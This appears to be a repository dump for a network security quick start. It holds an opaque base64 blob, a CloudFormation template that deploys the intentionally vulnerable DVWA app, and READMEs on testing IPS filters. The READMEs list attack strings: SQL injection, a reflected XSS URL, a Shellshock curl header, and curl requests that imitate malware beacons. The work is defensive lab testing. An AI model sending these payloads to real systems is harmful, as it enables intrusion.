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 -------------------------------------------------------------------------------- /edge-deployment/templates/dvwa.template: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | Description: DVWA Server with MySql DB 3 | Metadata: 4 | QuickStartDocumentation: 5 | EntrypointName: Launch into an existing VPC 6 | Order: 2 7 | LICENSE: Apache License, Version 2.0 8 | 'AWS::CloudFormation::Interface': 9 | ParameterGroups: 10 | - Label: 11 | default: Network configuration 12 | Parameters: 13 | - VPCID 14 | - PublicSubnet1ID 15 | - DVWARemoteAccessCIDR 16 | - Label: 17 | default: Amazon EC2 configuration 18 | Parameters: 19 | - KeyPairName 20 | - DVWAInstanceType 21 | - RootVolumeSize 22 | - Label: 23 | default: AWS Quick Start configuration 24 | Parameters: 25 | - QSS3BucketName 26 | - QSS3KeyPrefix 27 | - QSS3BucketRegion 28 | ParameterLabels: 29 | QSS3BucketRegion: 30 | default: Quick Start S3 bucket region 31 | DVWAInstanceType: 32 | default: DVWA instance type 33 | KeyPairName: 34 | default: Key pair name 35 | PublicSubnet1ID: 36 | default: Public subnet 1 ID 37 | QSS3BucketName: 38 | default: Quick Start S3 bucket name 39 | QSS3KeyPrefix: 40 | default: Quick Start S3 key prefix 41 | DVWARemoteAccessCIDR: 42 | default: Allowed DVWA external access CIDR 43 | VPCID: 44 | default: VPC ID 45 | RootVolumeSize: 46 | default: Root volume size 47 | cfn-lint: { config: { ignore_checks: [E9007] } } 48 | Parameters: 49 | DVWAInstanceType: 50 | AllowedValues: 51 | - t2.nano 52 | - t2.micro 53 | - t2.small 54 | - t2.medium 55 | - t2.large 56 | - t3.micro 57 | - t3.small 58 | - t3.medium 59 | - t3.large 60 | - t3.xlarge 61 | - t3.2xlarge 62 | - m4.large 63 | - m4.xlarge 64 | - m4.2xlarge 65 | - m4.4xlarge 66 | Default: t2.micro 67 | Description: Amazon EC2 instance type for the DVWA instances. 68 | Type: String 69 | KeyPairName: 70 | Description: Name of an existing public/private key pair. If you do not have one in this AWS Region, 71 | please create it before continuing. 72 | Type: 'AWS::EC2::KeyPair::KeyName' 73 | PublicSubnet1ID: 74 | Description: ID of the public subnet 1 that you want to provision the first DVWA into (e.g., subnet-a0246dcd). 75 | Type: 'AWS::EC2::Subnet::Id' 76 | QSS3BucketName: 77 | AllowedPattern: ^[0-9a-zA-Z]+([0-9a-zA-Z-]*[0-9a-zA-Z])*$ 78 | ConstraintDescription: The Quick Start bucket name can include numbers, lowercase 79 | letters, uppercase letters, and hyphens (-). It cannot start or end with a 80 | hyphen (-). 81 | Default: quickstart-network-security 82 | Description: Name of the S3 bucket for your copy of the Quick Start assets. 83 | Keep the default name unless you are customizing the template. 84 | Changing the name updates code references to point to a new Quick 85 | Start location. This name can include numbers, lowercase letters, 86 | uppercase letters, and hyphens, but do not start or end with a hyphen (-). 87 | See https://quickstart-network-security.github.io/option1.html. 88 | Type: String 89 | QSS3BucketRegion: 90 | Default: 'us-west-1' 91 | Description: The AWS Region where the Quick Start S3 bucket (QSS3BucketName) is hosted. When using your own bucket, you must specify this value. 92 | Type: String 93 | QSS3KeyPrefix: 94 | AllowedPattern: ^([0-9a-zA-Z-.]+/)*$ 95 | ConstraintDescription: The Quick Start S3 key prefix can include numbers, lowercase letters, 96 | uppercase letters, hyphens (-), and forward slashes (/). 97 | Default: edge-deployment/ 98 | Description: S3 key prefix that is used to simulate a directory for your copy of the 99 | Quick Start assets. Keep the default prefix unless you are customizing 100 | the template. Changing this prefix updates code references to point to 101 | a new Quick Start location. This prefix can include numbers, lowercase 102 | letters, uppercase letters, hyphens (-), and forward slashes (/). End with a forward slash. 103 | See https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html 104 | and https://quickstart-network-security.github.io/option1.html. 105 | Type: String 106 | DVWARemoteAccessCIDR: 107 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$ 108 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/x 109 | Description: Allowed CIDR block for external SSH access to the DVWAs. 110 | Type: String 111 | Default: '127.0.0.1/32' 112 | VPCID: 113 | Description: ID of the VPC (e.g., vpc-0343606e). 114 | Type: 'AWS::EC2::VPC::Id' 115 | RootVolumeSize: 116 | Description: The size in GB for the root EBS volume. 117 | Type: Number 118 | Default: '10' 119 | Rules: 120 | SubnetsInVPC: 121 | Assertions: 122 | - Assert: 123 | 'Fn::EachMemberIn': 124 | - 'Fn::ValueOfAll': 125 | - 'AWS::EC2::Subnet::Id' 126 | - VpcId 127 | - 'Fn::RefAll': 'AWS::EC2::VPC::Id' 128 | AssertDescription: All subnets must exist in the VPC. 129 | Mappings: 130 | RegionMap: 131 | us-east-1: #North Virginia 132 | DvwaAMI: ami-091ed521de20a50c2 133 | us-east-2: #Ohio 134 | DvwaAMI: ami-03d0d38f817e95c6f 135 | us-west-1: #North California 136 | DvwaAMI: ami-0b9e4c39f148b835c 137 | us-west-2: #Oregon 138 | DvwaAMI: ami-0adb84ff1c722394f 139 | Conditions: 140 | UsingDefaultBucket: !Equals 141 | - !Ref QSS3BucketName 142 | - 'quickstart-network-security' 143 | Resources: 144 | DVWASecurityGroup: 145 | Type: AWS::EC2::SecurityGroup 146 | Properties: 147 | GroupName: "DVWA-SG1" 148 | GroupDescription: "Security group to access DVWA instance" 149 | VpcId: !Ref VPCID 150 | SecurityGroupIngress: 151 | - IpProtocol: tcp 152 | FromPort: 80 153 | ToPort: 80 154 | CidrIp: 0.0.0.0/0 155 | - IpProtocol: tcp 156 | FromPort: 22 157 | ToPort: 22 158 | CidrIp: !Ref DVWARemoteAccessCIDR 159 | SecurityGroupEgress: 160 | - IpProtocol: tcp 161 | FromPort: 0 162 | ToPort: 65535 163 | CidrIp: 0.0.0.0/0 164 | DVWA: 165 | Type: AWS::EC2::Instance 166 | Properties: 167 | ImageId: 168 | Fn::FindInMap: 169 | - RegionMap 170 | - Ref: AWS::Region 171 | - DvwaAMI 172 | InstanceType: !Ref DVWAInstanceType 173 | KeyName: !Ref KeyPairName 174 | Tags: 175 | - Key: Name 176 | Value: DVWA 177 | SubnetId: !Ref PublicSubnet1ID 178 | SecurityGroupIds: 179 | - Ref: DVWASecurityGroup 180 | BlockDeviceMappings: 181 | - DeviceName: /dev/sdm 182 | Ebs: 183 | DeleteOnTermination: true 184 | VolumeSize: !Ref RootVolumeSize 185 | Outputs: 186 | DVWASecurityGroup: 187 | Description: DVWA security group ID. 188 | Value: !Ref DVWASecurityGroup 189 | Export: 190 | Name: !Sub '${AWS::StackName}-DVWASecurityGroupID' 191 | DVWAPublicIP: 192 | Description: DVWA instance Public IP 193 | Value: !GetAtt DVWA.PublicIp 194 | Export: 195 | Name: !Sub '${AWS::StackName}-DVWAInstancePublicIP' 196 | Postdeployment: 197 | Description: See the deployment guide for post-deployment steps. 198 | Value: https://aws.amazon.com/quickstart/?quickstart-all.sort-by=item.additionalFields.sortDate&quickstart-all.sort-order=desc&awsm.page-quickstart-all=5 -------------------------------------------------------------------------------- /centralized-with-gwlb/README.md: -------------------------------------------------------------------------------- 1 | # centralized-deployment-with-gwlb 2 | 3 | ## Purpose and Objectives 4 | 5 | This Quick Start deploys a security VPC with Apache web server for inbound traffic inspection. It also deploys Damn Vulnerable Web Application (DVWA) in one of the public subnets. The purpose of this quickstart is to provide users a sample environment where they can deploy Network Security Virtual Appliance to protect their resources from inbound internet traffic. In this deployment, we use Gateway Load Balancer to route traffic to Network Security Appliance. 6 | 7 | After deploying this Quick Start, you will be able to: 8 | 9 | - Deploy Network Security Virtual Appliance (NSVA) as [Centralized Inbound Protection](https://cloudone.trendmicro.com/docs/network-security/GWLB_CFdeploy1/) 10 | - Configure your security profile in Network Security console by distributing various Intrustion Prevention (IPS), Geo Filters to prevent your resources from inbound attacks 11 | - Perform various inbound and outbound attacks to validate protection. 12 | - Access logs of Network Security Virtual Applicance (NSVA) to verify which filters are getting triggered. 13 | ## Network Architecture 14 | 15 | 16 | 17 | ## Deployment Steps 18 | 19 | *Note: You can deploy this Quick Start using the default S3 template link below if you don't wish to make changes to this code and deploy with your own customized changes:* 20 | 21 | `https://quickstart-network-security.s3.us-west-1.amazonaws.com/centralized-with-gwlb/templates/Master.yaml` 22 | ### 1. Deploy Network Security with Centralized Security VPC 23 | The Quick Start offers two deployment options: 24 | 25 | - Deploying Network Security with centralized security VPC without High Availability 26 | - Deploying Network Security with centralized security VPC with High Availability 27 | 28 | Following are pre-requisites that must be fulfilled before you could deploy the Quick Start: 29 | - Create a new SSH key pair in the AWS region you will be deploying the Quick Start 30 | - [Generate a CloudOne API Key](https://cloudone.trendmicro.com/docs/network-security/add_cloud_accounts_appliances/#generate-an-api-key) 31 | 32 | Below are the parameters for Quick Start: 33 | #### Quick Start Parameters 34 | 35 | ##### Required parameters 36 | | Parameter label (name) | Default | Description | 37 | | :----------------------| :------------- | :------------------------------------------------------------- | 38 | | AllowIP | 127.0.0.1/32 | Only the IP entered here will be able to access the web server | 39 | | BucketName | quickstart-network-security | Name of the bucket where the template is placed | 40 | | BucketPrefix | centralized-with-gwlb/ | Bucket prefix | 41 | | BucketRegion | us-west-1| Bucket region | 42 | | DVWAInstanceType | t3.micro | Amazon EC2 instance type for the DVWA instances | 43 | | sshKeyPairName | None| [Required: 'DeployC1NS' must be set to true] SSH Key of the EC2 you are using | 44 | | SSMAccess | true | If enabled, SSM access to the instance will be available | 45 | | DeployHTTPS | false | If enabled, The HTTPS site will be deployed | 46 | | DeployC1NS | true | If enabled, C1NS with be deployed in centralized Security VPC | 47 | | DeployC1NSHA | false | [KEEP IT to 'false', DOESN'T WORK CURRENTLY] If enabled, C1NS will be deployed in centralized Security VPC | 48 | | DeploySplunk | false | [Required: 'DeployC1NS' must be set to true] If enabled, Splunk Server will be deployed | 49 | 50 | ##### If you set the DeployHTTPS parameter to true, the following parameters are required 51 | | Parameter label (name) | Default | Description | 52 | | :----------------------| :------------- | :------------------------------------------------------------- | 53 | | DomainName | None | Domain name to be used for the website | 54 | | SubDomain | None | Subdomain to be used for the ALB. | 55 | | HostZoneID | None | ID of the HostZone where the domain you want to use is registered. The domain name to be used must be registered in Route53's HostZone. If you have not already done so, please create a new HostZone and register your domain. The HostZone must be public | 56 | 57 | ##### If you set the DeployC1NS parameter to true, the following parameters are required 58 | | Parameter label (name) | Default | Description | 59 | | :----------------------| :------------- | :------------------------------------------------------------- | 60 | | CloudOneAPIKEY | None | CloudOne API key you want to use | 61 | | InstanceType | c5n.2xlarge | Instance type of NSVA | 62 | | SecurityVPCCIDR | 10.10.10.0/16 | CIDR of the VPC where you want to deploy the NSVA | 63 | | NsvaCountPerAz | 1 | Number of NSVA instances to be deployed in the AZ | 64 | | EnableInspectionLogs | false | If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs" | 65 | 66 | ##### If you set the DeploySplunk parameter to true, the following parameters are required 67 | | Parameter label (name) | Default | Description | 68 | | :----------------------| :------------- | :------------------------------------------------------------- | 69 | | SyslogPort | 5140 | Port number used by Splunk Server | 70 | | SplunkPassword | None | Password used by Splunk Server | 71 | | SplunkVersion | 8.2 | Splunk Version | 72 | 73 | ## Performing IPS and SQL Attacks 74 | 75 | Before performing each attack, please perform the following steps: 76 | 1. Configure respective filter to Block and Log mode in Trend Micro Cloud One console. For detailed steps please check [Customize filter settings using the GUI](https://cloudone.trendmicro.com/docs/network-security/Customize_filter_settings_GUI/) 77 | 2. Distribute profile with filter overrides. For detailed steps please check [Distribute filter overrides to your network](https://cloudone.trendmicro.com/docs/network-security/Filter_overrides_GUI/) 78 | 79 | ### SQL Attacks 80 | 81 | SQL Attacks can be performed on DVWA server that is spun up as part of the Quick Start. In order to perform SQL Attacks, you wil need to first configure the application security level to "Low" in order for attacks to work properly. This can be done as follows: 82 | 83 | 1. Login to DVWA application from your browser. You can retrieve the DVWAPublicIP from the "Output" tab of your DVWA CloudFormation stack. The URL would be `http://` 84 | 2. Login to Web Application using following default credentials 85 | Username: `admin` 86 | Password: `password` 87 | 3. Go to DVWA Security menu on the side navigation panel 88 | 4. Set Security Level to "Low" and hit Submit button 89 | 90 | Below are some SQL attacks you can perform on your DVWA server 91 | 92 | | Filter ID | Attack | 93 | | :--------- | :------------------------------------------------------------ | 94 | | 3593 | 1. Go to SSL Injection menu on the side navigation panel
2. Enter `?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit` in "User ID" text box and hit submit | 95 | | 12365 | On your browser, enter `http:///vulnerabilities/xss_d/?default=English%3Cscript%3Ealert(1)%3C/script%3E` | 96 | 97 | ### Inbound Attacks 98 | 99 | Inbound attacks could be performed on any publicly accessible webserver. In this case, we can perform a simple Shell Shock attack on our DVWA or Web Server created 100 | 101 | | Filter ID | Attack | 102 | | :--------- | :----------------------------------------------------------------- | 103 | | 16798 | `curl -H "User-Agent: () { :; }; /bin/eject" http://` | 104 | -------------------------------------------------------------------------------- /edge-deployment/README.md: -------------------------------------------------------------------------------- 1 | # quickstart-network-security-edge-deployment 2 | 3 | *Note: This Quick Start is an adaptation of original [Wordpress High Availability By Bitnami](https://github.com/aws-quickstart/quickstart-bitnami-wordpress). The original quickstart has been modified to include DVWA instance in the deployment* 4 | 5 | ## Purpose and Objectives 6 | 7 | This Quick Start deploys WordPress High Availability by Bitnami, which includes WordPress and Amazon Aurora, in a highly available environment on AWS in about 40 minutes. It also deploys Damn Vulnerable Web Application (DVWA) in one of the public subnets. The purpose of this quickstart is to provide users a sample environment where they can deploy Network Security Virtual Appliance to protect their resources including web servers and databases etc. 8 | 9 | After deploying this Quick Start, you will be able to: 10 | 11 | - Deploy Network Security Virtual Appliance (NSVA) as an [Edge Protection](https://cloudone.trendmicro.com/docs/network-security/option1/) 12 | - Configure your security profile in Network Security console by distributing various Intrustion Prevention (IPS), Geo Filters to prevent your resources from inbound and outbound attack. 13 | - Perform various inbound and outbound attacks to validate protection. 14 | - Access logs of Network Security Virtual Applicance (NSVA) to verify which filters are getting triggered. 15 | 16 | ## Quick Start architecture for WordPress High Availability by Bitnami and DVWA on AWS 17 | 18 | 19 | 20 | ## Deployment Steps 21 | 22 | *Note: You can deploy this Quick Start using the default S3 template link below if you don't wish to make changes to this code and deploy with your own customized changes:* 23 | 24 | `https://quickstart-network-security.s3.us-west-1.amazonaws.com/edge-deployment/templates/edge-deployment.template` 25 | ### 1. Deploy sample Wordpress environment with DVWA 26 | The Quick Start offers two deployment options: 27 | 28 | - Deploying WordPress High Availability by Bitnami and DVWA into a new virtual private cloud (VPC) on AWS 29 | - Deploying WordPress High Availability by Bitnami and DVWA into an existing VPC on AWS 30 | 31 | For architectural details, best practices, step-by-step instructions, and customization options, see the 32 | [Bitnami quickstart deployment guide](https://fwd.aws/arqWN). 33 | 34 | Before proceeding to deploy the Quick Start, please create a new SSH key pair for DVWA instance in the AWS region you will be deploying the Quick Start to. You may use the same key pair as the one you created for Bastion hosts if you don't want to create an additional keypair. 35 | 36 | Below are the additional parameters for DVWA Configuration that the Quickstart uses: 37 | 38 | #### DVWA Configuration 39 | 40 | | Parameter label (name) | Default | Description | 41 | | :--------------------------------------------------------| :------------- | :----------------- | 42 | | DVWA Instance Type (DVWAInstanceType) | t2.micro | Amazon EC2 instance type for the DVWA instance | 43 | | Allowed DVWA External Access CIDR (DVWARemoteAccessCIDR) | 127.0.0.1/32 | The CIDR IP range that is permitted external SSH access to the bastion host instances. We recommend that you set this value to a trusted IP range | 44 | | SSH KeyPair Name (DVWAKeyPairName) | Requires input | A public/private key pair, which allows you to connect securely to your instance after it launches. When you created an AWS account, this is the key pair you created in your preferred region | 45 | ### 2. Deploying Network Security to your environment 46 | 47 | After the CloudFormation stack is successfully deployed, please use the deployment wizard in your Network Security console to deploy Network Security Appliance in your environment. For detailed step-by-step instructions on deploying Network Security please check [Deploy Protection](https://cloudone.trendmicro.com/docs/network-security/add_cloud_accounts_appliances/) section 48 | 49 | Once the Network Security Virtual Appliances have been succcessfully deployed, make sure they are visible in the Trend Micro Cloud One console and are reporting 'Active' status. 50 | 51 | Your environment is now ready to inspect inbound and outbound traffic! 52 | 53 | ### 3. Enable CloudWatch logs for your Network Security Appliances 54 | 55 | In order to see the block logs after doing various attacks, you will need to configure logs for each of your Network Security Appliance. For detailed step-by-step instructions on enabling CloudWatch logs please check [Enable CloudWatch logs](https://cloudone.trendmicro.com/docs/network-security/Manage_Network_Security_instances/#cloudwatch) 56 | 57 | You will need to enable at least `ipsBlock` and `reputationBlock` to see logs from attacks listed below. 58 | 59 | ## Performing IPS, Geo and SQL Attacks 60 | 61 | Before performing each attack, please perform the following steps: 62 | 1. Configure respective filter to Block and Log mode in Trend Micro Cloud One console. For detailed steps please check [Customize filter settings using the GUI](https://cloudone.trendmicro.com/docs/network-security/Customize_filter_settings_GUI/) 63 | 2. Distribute profile with filter overrides. For detailed steps please check [Distribute filter overrides to your network](https://cloudone.trendmicro.com/docs/network-security/Filter_overrides_GUI/) 64 | 65 | ### Outbound Attacks 66 | 67 | Below is the list of outbound attacks you can perform from your Wordpress WebServer. You will need to SSH into the webserver instance via Bastion Host that is created as part of the Quick Start setup. 68 | 69 | | Filter ID | Attack | 70 | | :--------- | :-------------------------------------------------------------- | 71 | | 25492 | `curl -H 'User-Agent: sdvntyer' http://www.example.com/api/v88` | 72 | | 34738 | `curl 'http://www.example.com/includes/main.php?t=7d4580a3910c54d62b46f24c397c8d59&f=g2&type=cmd&id=D7CB4B6E5A21CA596DE0A7E10059C85E'`| 73 | | 38451 | `curl -H 'User-Agent: ArcherGhost' -d 'post=eyJkYXRhIjogeyJkb21haW4iOiAiaHR0cDovL3RhcmdldDEyMy5jb20vYXNzZXRzL3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQL3Nzc3AucGhwIiwgInNlcnZlciI6ICIxOTIuMTY4LjEwNy4xOSIsICJ0aXRsZSI6ICJqcSJ9LCAidHlwZSI6ICJzY2FubmVyIn0%3D' http://www.example.com/adeliap/404.php` | 74 | 75 | ### Geo Filter Attacks 76 | 77 | In order to perform Geo Filter attacks, you need to first configure Geo Filters in Trend Micro Cloud One console by selecting a geographic region to block traffic. For detailed steps on how to configure Geo Filters, please check [Geolocation Filter](https://cloudone.trendmicro.com/docs/network-security/Geo_Location_filtering/). 78 | 79 | Below is the list of geofilter attacks you can perform from your Wordpress WebServer. You will need to SSH into the webserver instance via Bastion Host that is created as part of the Quick Start setup. 80 | 81 | | Region | Attack | 82 | | :----- | :----------------------- | 83 | | China | `curl https://baidu.com` | 84 | | Russia | `curl https://mail.ru ` | 85 | 86 | ### SQL Attacks 87 | 88 | SQL Attacks can be performed on DVWA server that is spun up as part of the Quick Start. In order to 